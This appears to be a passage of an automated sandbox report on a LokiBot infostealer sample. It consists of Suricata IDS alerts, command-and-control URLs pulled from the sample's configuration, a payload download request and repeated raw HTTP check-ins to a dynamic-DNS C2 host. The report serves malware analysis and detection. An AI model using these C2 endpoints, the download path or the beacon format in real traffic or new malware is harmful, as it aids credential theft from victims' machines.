                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49728
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49745 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49745 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49792 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49750 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49771
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49774
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49745 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49797
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49769
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49745 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49763 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49763 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49763 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49780 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49808 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49780 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49780 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49809
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49763 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49763 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49799 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49778 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49799 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49799 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49785 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49785 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49765 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49765 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49792 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49724 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49773
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49715 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49740
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49765 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49724 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49780 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49780 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49709 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49763
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49709 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49765 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49765 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49709
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49786 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49782 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49786 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49786 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49731 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49731 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49731 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49768 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49768 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49768 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49731 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49731 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49768 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49768 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49731
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49785 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49765
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49782 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49782 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49778 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49785 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49785 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49778 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49786 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49785
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49808 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49786 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49808 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49791 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49782 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49791 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49778 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49782 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49778 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49768
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49790 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49790 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49808 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49777 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49791 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49790 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49808 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49806 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49778
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49790 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49805
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49791 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49750 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49782
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49790 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49750 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49724 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49777 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.10:49777 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 45.149.241.169:80 -> 192.168.2.10:49786
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49724 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49724 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49777 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49796 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.10:49796 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.10:49750 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49777 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.10:49784 -> 45.149.241.169:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.10:49750 -> 45.149.241.169:80
                Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                Source: Malware configuration extractorURLs: http://freighteighttwocam.ddns.net/mdifygidj/five/fre.php
                Source: unknownDNS query: name: freighteighttwocam.ddns.net
                Source: global trafficHTTP traffic detected: GET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1Host: www.sodiumlaurethsulfatedesyroyer.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewASN Name: UUNETUS UUNETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 172Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 172Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
